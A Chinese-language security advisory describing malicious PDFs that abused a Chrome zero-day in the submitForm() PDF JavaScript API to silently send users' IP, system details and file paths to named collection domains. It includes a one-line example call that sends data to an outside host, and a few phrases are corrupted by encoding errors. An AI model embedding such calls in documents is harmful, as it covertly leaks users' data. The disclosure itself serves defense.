惡意PDF文件利用Chrome瀏覽器0day漏洞安全通告
發布時間 2019-03-01漏洞編號和級別
CVE編號:暫無,危險級別:高危, CVSS分值:官方未評定
影響范圍
受影響版本:
Google Chrome瀏覽器所有版本
漏洞概述
近期,來自國外的安全研究人員在野外檢測到多個PDF惡意樣本。這些樣本利用了Chrome瀏覽器的0day漏洞,以實現追蹤用戶并悄悄某些收集用戶信息的目的。
目前發現了兩組利用Chrome零日漏洞的惡意PDF文件,其中一組文件在2017年10月傳播,另一組文件在2018年9月傳播。第一批惡意PDF文件將用戶數據發送回“readnotify.com”,第二批發送回“zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”。
漏洞的根源在于this.submitForm()這個PDF Javascript API。像this.submitForm('http://google.com/test')這樣一個簡單的調用就會導致Chrome把個人信息發送到google.com??赡鼙恍孤兜男畔ǎ?
1.用戶的公共IP地址。
2.操作系統,Chrome版本等(在HTTP POST header中)。
3.用戶計算機上PDF文件的完整路徑(在HTTP POST payload中)。
當用戶使用Chrome瀏覽器打開這些惡意樣本時,樣本會運行惡意代碼,在未經用戶批準的情況下,以HTTP POST數據包的形式將一些用戶信息靜默發送到指定域“readnotify.com ”。
除去信息泄露以外,該漏洞暫未發現其它利用方式,但毫無疑問,這些泄露的用戶信息可以幫助攻擊者進行更多活動。
修復建議
目前該0day漏洞尚未有官方補丁,但Chrome團隊或許將于4月底修復該漏洞。
臨時緩解措施:
在補丁發布之前,建議用戶使用PDF閱讀器應用程序在本地查看PDF文檔,直到Chrome修復漏洞?;蛟贑hrome中打開PDF文檔時斷開計算機與Internet的連接。
參考鏈接
https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html